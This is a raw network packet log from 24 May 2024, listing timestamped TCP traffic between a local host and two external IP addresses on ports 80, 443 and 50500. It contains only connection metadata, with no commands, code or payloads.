                                May 24, 2024 00:22:02.794234037 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.794281006 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.794281006 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.794979095 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.794991016 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.795001030 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.795028925 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.795049906 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.795717955 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.795731068 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.795741081 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.795783997 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.795804024 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.796483994 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.796495914 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.796504974 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.796518087 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.796538115 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.797240019 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.797252893 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.797261953 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.797291994 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.797291994 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.797600031 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.842379093 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.842992067 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.852221012 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.852339029 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.852376938 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.852376938 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.852588892 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.852601051 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.852722883 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.852787971 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.852847099 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.853033066 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853045940 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853096962 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.853096962 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.853429079 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853441954 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853498936 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.853498936 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.853722095 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853735924 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853744984 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853756905 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853769064 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.853787899 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.853787899 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.853816986 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.854573011 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.854585886 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.854731083 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.854995012 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.855050087 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.855288982 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.855303049 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.855314016 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.855324984 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.855336905 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.855349064 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.855374098 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.855453968 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.856165886 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.856178999 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.856189013 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.856200933 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.856247902 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.856247902 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.856980085 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.857150078 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.857228994 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.857240915 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.857250929 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.857263088 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.857275963 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.857299089 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.857321024 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.857321024 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.858129025 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.858140945 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.858150959 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.858163118 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.858187914 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.858211994 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.858972073 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.858984947 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.858999014 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.859011889 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.859025002 CEST80497145.42.65.116192.168.2.6
                                May 24, 2024 00:22:02.859025002 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.859071970 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:02.859071970 CEST4971480192.168.2.65.42.65.116
                                May 24, 2024 00:22:03.320512056 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:03.325505018 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:03.518780947 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:03.518872023 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:03.518968105 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:03.520067930 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:03.520106077 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:03.673809052 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:03.715934038 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:04.011485100 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.011687994 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.013134003 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.013164043 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.013510942 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.059792995 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.065088034 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.067235947 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.067317963 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.178325891 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.178375006 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.178445101 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.185731888 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.185767889 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.254437923 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.254467964 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.254580975 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.255673885 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.255698919 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.682301044 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.682409048 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.683821917 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.683850050 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.684099913 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.731545925 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.739542007 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.739581108 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.739721060 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.754940033 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.755220890 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.755413055 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.755511045 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.755511045 CEST49715443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.755553961 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.755584002 CEST44349715188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.758884907 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.758975983 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.759043932 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.759336948 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.759371042 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.803931952 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.804102898 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.805160046 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.805187941 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.805454969 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:04.856652975 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.858208895 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.858258963 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:04.858402967 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.165910006 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.165982008 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.166212082 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.167390108 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.167438030 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.167469025 CEST49716443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.167484999 CEST44349716188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.172481060 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.172524929 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.172611952 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.172883034 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.172913074 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.243197918 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.243284941 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.243489027 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.243902922 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.243928909 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.243954897 CEST49717443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.243966103 CEST44349717188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.248577118 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.248620033 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.248692989 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.249068022 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.249084949 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.261861086 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.261941910 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.263396025 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.263401985 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.264020920 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.265182972 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.265201092 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.265314102 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.707345963 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.711601973 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.711695910 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.711733103 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.711766958 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.711899996 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.711908102 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.724263906 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.724328041 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.724335909 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.732822895 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.732903957 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.732948065 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.732980967 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.733256102 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.739587069 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.745138884 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.745203972 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.745232105 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.745311975 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.745378971 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.745385885 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.745513916 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.745899916 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.748148918 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.748171091 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.748184919 CEST49718443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.748192072 CEST44349718188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.758866072 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.758939028 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.780672073 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.780733109 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.782324076 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.782356024 CEST44349721188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.782507896 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.782799006 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.782818079 CEST44349721188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.784063101 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.784100056 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.784382105 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.785337925 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.785348892 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.785612106 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.807888031 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.807924986 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.807979107 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:05.809787989 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.809871912 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:05.809911013 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.216047049 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.222182989 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.222218990 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.222266912 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.222306967 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.222326994 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.222364902 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.239577055 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.239603043 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.239701033 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.239717007 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.239769936 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.249526978 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.256980896 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.256999969 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.257041931 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.257055998 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.257097960 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.263669968 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.263761997 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.263813019 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.264225006 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.264241934 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.264265060 CEST49720443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.264271021 CEST44349720188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.290657997 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.290692091 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.290932894 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.291153908 CEST44349721188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.291232109 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.291358948 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.291371107 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.292442083 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.292447090 CEST44349721188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.292947054 CEST44349721188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.294275999 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.294441938 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.294475079 CEST44349721188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.325629950 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:06.375319004 CEST50500497105.42.65.116192.168.2.6
                                May 24, 2024 00:22:06.375530005 CEST4971050500192.168.2.65.42.65.116
                                May 24, 2024 00:22:06.518342972 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.520184040 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.520257950 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.520319939 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.522205114 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.522403955 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.522464037 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.530204058 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.530226946 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.530313015 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.530338049 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.530420065 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.534255028 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.534291029 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.534354925 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.534374952 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.542128086 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.542150021 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.542186975 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.542200089 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.542222977 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.542259932 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.542289019 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.542843103 CEST49719443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.542872906 CEST44349719188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.685372114 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.685414076 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.685491085 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.685867071 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.685883045 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.758001089 CEST44349721188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.758241892 CEST44349721188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.758282900 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.758308887 CEST49721443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.818380117 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.818447113 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.824188948 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.824212074 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.824233055 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.824275970 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.824337006 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.824436903 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.824727058 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.824743032 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:06.826215029 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.826437950 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:06.826468945 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.175438881 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.175515890 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.203603983 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.203630924 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.203906059 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.212569952 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.213277102 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.213313103 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.343456030 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.343538046 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.351070881 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.351089001 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.351979971 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.353509903 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.353843927 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.353895903 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:07.353956938 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:07.353964090 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:08.097048044 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:08.097163916 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:08.097373009 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:08.102937937 CEST49723443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:08.102962017 CEST44349723188.114.96.3192.168.2.6
                                May 24, 2024 00:22:08.244071007 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:08.244175911 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:08.244231939 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:08.256484032 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:08.256773949 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:08.256859064 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.433924913 CEST49724443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.433962107 CEST44349724188.114.96.3192.168.2.6
                                May 24, 2024 00:22:09.677088976 CEST49726443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.677136898 CEST44349726188.114.96.3192.168.2.6
                                May 24, 2024 00:22:09.677196980 CEST49726443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.677485943 CEST49726443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.677501917 CEST44349726188.114.96.3192.168.2.6
                                May 24, 2024 00:22:09.742147923 CEST49722443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.742182970 CEST44349722188.114.96.3192.168.2.6
                                May 24, 2024 00:22:09.774282932 CEST49729443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.774327993 CEST44349729188.114.96.3192.168.2.6
                                May 24, 2024 00:22:09.774400949 CEST49729443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.774729967 CEST49729443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:09.774765968 CEST44349729188.114.96.3192.168.2.6
                                May 24, 2024 00:22:10.181468010 CEST44349726188.114.96.3192.168.2.6
                                May 24, 2024 00:22:10.181607008 CEST49726443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:10.182842016 CEST49726443192.168.2.6188.114.96.3
                                May 24, 2024 00:22:10.182849884 CEST44349726188.114.96.3192.168.2.6
